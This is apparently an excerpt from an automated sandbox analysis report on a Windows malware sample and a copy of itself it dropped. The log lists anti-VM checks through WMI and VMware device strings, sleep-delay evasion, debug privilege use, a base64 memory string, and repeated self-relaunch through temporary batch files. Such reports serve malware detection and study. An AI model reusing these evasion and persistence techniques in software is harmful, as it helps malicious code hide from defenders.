Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\IrnfaqBK.log	Jump to dropped file

Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe TID: 6648	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe TID: 4320	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe TID: 1612	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe TID: 2720	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe TID: 5764	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe TID: 6620	Thread sleep time: -30000s >= -30000s
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe TID: 3524	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe TID: 7060	Thread sleep time: -30000s >= -30000s
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe TID: 2792	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe TID: 2848	Thread sleep time: -30000s >= -30000s
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe TID: 2668	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe TID: 3400	Thread sleep time: -30000s >= -30000s
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe TID: 3964	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe TID: 1712	Thread sleep time: -30000s >= -30000s
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe TID: 6528	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe TID: 1880	Thread sleep time: -30000s >= -30000s
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe TID: 2124	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe TID: 6072	Thread sleep time: -30000s >= -30000s
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe TID: 6408	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\chcp.com	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\System32\chcp.com	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\chcp.com	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Windows\System32\chcp.com	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: vb8DOBZQ4X.exe, 00000000.00000002.1736281851.0000000002761000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000005.00000002.1842059954.0000000002951000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 0000000E.00000002.1987860435.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000014.00000002.2139072158.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 0000001A.00000002.2282790055.0000000002731000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000020.00000002.2402622634.0000000003521000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000026.00000002.2511025433.0000000002631000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 0000002D.00000002.2653710788.0000000002551000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000033.00000002.2772444943.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000039.00000002.2887348058.00000000031A1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %ZsijNo7xX8lfdHGPIk.g5hgFShsJiCvPVtAvP`
Source: GSwhJpqdkmruXxiphyV.exe, 0000001A.00000002.2371136074.000000001B6BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\._E
Source: GSwhJpqdkmruXxiphyV.exe, 0000002D.00000002.2747569027.000000001BF70000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_
Source: GSwhJpqdkmruXxiphyV.exe, 0000000E.00000002.2026164240.000000001C4EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}{h&%
Source: vb8DOBZQ4X.exe, 00000000.00000002.1764780839.000000001B2E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: vb8DOBZQ4X.exe, GSwhJpqdkmruXxiphyV.exe1.0.dr	Binary or memory string: ZsijNo7xX8lfdHGPIk.g5hgFShsJiCvPVtAvP
Source: vb8DOBZQ4X.exe, GSwhJpqdkmruXxiphyV.exe1.0.dr	Binary or memory string: is tampered.KJWU01Ep478SDhGypHt.rE4VDPZVQ1KLUVZaqdSHA1KZsijNo7xX8lfdHGPIk.g5hgFShsJiCvPVtAvPKUUUqiOXZ9mR7ip7P2F.NV2QXvLxUsveWEqxFC3{11111-22222-50001-00000};GetDelegateForFunctionPointer
Source: w32tm.exe, 00000032.00000002.2697779508.000002140B3A7000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000038.00000002.2810810490.000001851CE97000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
Source: GSwhJpqdkmruXxiphyV.exe, 0000001A.00000002.2366679350.000000001B648000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!0
Source: GSwhJpqdkmruXxiphyV.exe, 0000001A.00000002.2282790055.0000000002A65000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ESdBaaZCk2yFi0E+h+uGMQNydYHGLIGKQMsCGQgik4K+mGPVI/2wp4GjjDbBvIuAHLAMQz1mF4ZtgI5BsiGa6tHkL0jZB+MclcSnpWQkqUzmrTsDkNMGYO4xuw1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA
Source: GSwhJpqdkmruXxiphyV.exe, 00000026.00000002.2589006306.000000001C040000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\&
Source: GSwhJpqdkmruXxiphyV.exe, 00000020.00000002.2481680730.000000001BE49000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 00000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_C
Source: GSwhJpqdkmruXxiphyV.exe, 0000001A.00000002.2366679350.000000001B648000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0
Source: GSwhJpqdkmruXxiphyV.exe, 00000020.00000002.2481680730.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}S
Source: GSwhJpqdkmruXxiphyV.exe, 00000020.00000002.2490979937.000000001C513000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\A
Source: w32tm.exe, 00000004.00000002.1787245721.000002E541338000.00000004.00000020.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000005.00000002.1885814794.000000001B254000.00000004.00000020.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 0000000E.00000002.2021331309.000000001B44F000.00000004.00000020.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000014.00000002.2207860586.000000001C1E1000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000001F.00000002.2328851041.00000200BD5D9000.00000004.00000020.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000020.00000002.2481680730.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000025.00000002.2442884141.000001DC56CD9000.00000004.00000020.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000026.00000002.2583407965.000000001B03D000.00000004.00000020.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 0000002D.00000002.2741223514.000000001AE20000.00000004.00000020.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000033.00000002.2889841599.000000001B88A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: GSwhJpqdkmruXxiphyV.exe, 00000033.00000002.2912022246.000000001C0ED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\

Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process token adjusted: Debug
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process token adjusted: Debug
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process token adjusted: Debug
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process token adjusted: Debug
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process token adjusted: Debug
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process token adjusted: Debug
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\tzbRZhAhjd.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qgs8WdcQ4J.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\HSh65PBXsw.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1dc23k5BXS.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZLKnXXaim4.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\dvHErHhaAz.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\EAk7xcglkE.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZxWzsCgC4b.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\xtlNdaBxkU.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
